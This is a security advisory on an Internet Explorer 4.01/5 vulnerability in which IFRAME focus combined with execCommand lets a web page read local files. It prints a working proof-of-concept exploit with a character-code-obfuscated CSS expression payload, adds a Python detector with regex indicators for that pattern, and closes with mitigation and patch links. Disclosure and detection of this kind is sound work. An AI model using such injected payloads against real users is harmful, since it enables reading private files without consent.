COMMAND
Internet Explorer
SYSTEMS AFFECTED
Internet Explorer 4.01 (versions prior to SP2), 5
PROBLEM
The IE 5 security model normally restricts the
Document.ExecCommand() method to prevent it from taking
inappropriate action on a user's computer. However, at least one
of these restrictions is not present if the method is invoked on
an IFRAME. This could allow a malicious web site operator to read
the contents of files on visiting users' computers, if he or she
knew the name of the file and the folder in which it resided.
The vulnerability would not allow the malicious user to list the
contents of folders, create, modify or delete files, or to usurp
any administrative control over the machine.
This was originally found by Georgi Guninski. In some cases it is
also possible to read files behind a firewall. The problem is the
combination of IFRAME and document.execCommand. Normally, you
cannot use execCommand on an IFRAME from another domain. But if
you do "IFRAME.focus(); document.execCommand", then the command is
executed in the IFRAME (some commands do not work this way, but
some do, and that is enough). So, we create an IFRAME with
SRC="file://c:/test.txt" and inject JavaScript code into it. When
the JavaScript code is executed, it runs in the security context
of the IFRAME, i.e. the "file:" protocol. The injection is done
using the "InsertParagraph" command (other commands would
presumably work as well), which sets the ID of the paragraph. If
a " is placed in the ID, a STYLE attribute may be inserted as
well. The JavaScript code is injected using that STYLE attribute:
STYLE="left:expression(eval(JSCode))"
This vulnerability may be exploited using an HTML email message or
a newsgroup posting. The code is:
<SCRIPT>
alert("Create text file c:\\test.txt and it will be read");
function f()
{
I1.focus();
document.execCommand("selectAll");
document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'");
}
setTimeout('f()',2000);
</SCRIPT>
<IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME>
Demonstration is available at:
http://www.nat.bg/~joro/execcommand.html
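As an added example (not part of the original advisory or of Guninski's code), the following Python helper shows how a mail gateway or analyst could triage an HTML body for the pattern described above: it first decodes String.fromCharCode(...) obfuscation, then flags a file: IFRAME, the execCommand("InsertParagraph") call, a CSS expression(), and a file:// URI inside a SCRIPT block. The two sample bodies are constructed for the demonstration.

```python
import re
from typing import List

# Decode String.fromCharCode(97,61,...) literals in place, so indicators hidden behind
# character-code obfuscation (as in the advisory's payload) become visible to the checks.
_FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")

def decode_fromcharcode(text: str) -> str:
    def _sub(m):
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
    return _FROMCHARCODE.sub(_sub, text)

# Indicators of the IFRAME + execCommand pattern the advisory describes, checked after decoding.
_INDICATORS = {
    "iframe-file-src": re.compile(r"<iframe[^>]*\ssrc\s*=\s*[\"']?\s*file:", re.I),
    "execCommand-InsertParagraph": re.compile(r"execCommand\s*\(\s*[\"']InsertParagraph", re.I),
    "css-expression": re.compile(r"\bexpression\s*\(", re.I),
    "file-uri-in-script": re.compile(r"<script[^>]*>.*?file:/{2}.*?</script>", re.I | re.S),
}

def triage(html: str) -> List[str]:
    """Return the names of indicators present in an HTML or mail body; [] means none found."""
    decoded = decode_fromcharcode(html)
    return [name for name, rx in _INDICATORS.items() if rx.search(decoded)]

# Constructed samples (not from any real message): a benign page, and one that hides a
# window.open('file://...') call behind String.fromCharCode like the advisory's payload does.
BENIGN = '<iframe id="ad" src="http://example.com/ad.html"></iframe>'
SUSPECT = (
    '<script>I1.focus();document.execCommand("InsertParagraph",false,'
    '">\\"STYLE=\'left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,'
    '46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,120,39,41)))\'");</script>'
    '<iframe id="I1" src="file://c:/x"></iframe>'
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, triage(body) or "no indicators")
```

Because matching runs on the decoded text, the file:// reference is found even though the sample script never spells it out literally.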
SOLUTION
As an interim step while the patch is under development, Microsoft
recommends that customers add sites that they trust to the Trusted
Zone, and disable Active Scripting in the Internet Zone. This
will provide full functionality for all trusted sites, while
preventing untrusted sites from being able to exploit this
vulnerability.
Internet Explorer 4.01 users should apply IE 4.01 Service Pack 2
at:
http://www.microsoft.com/windows/ie/download/windows.htm
Internet Explorer 5 users should apply the patch for this
vulnerability at:
Intel Platform: ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe
Alpha Platform: ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe
The IE5 patch also includes the previously released fix for the
"Download Behavior" vulnerability, and will shortly be available
at http://windowsupdate.microsoft.com as well.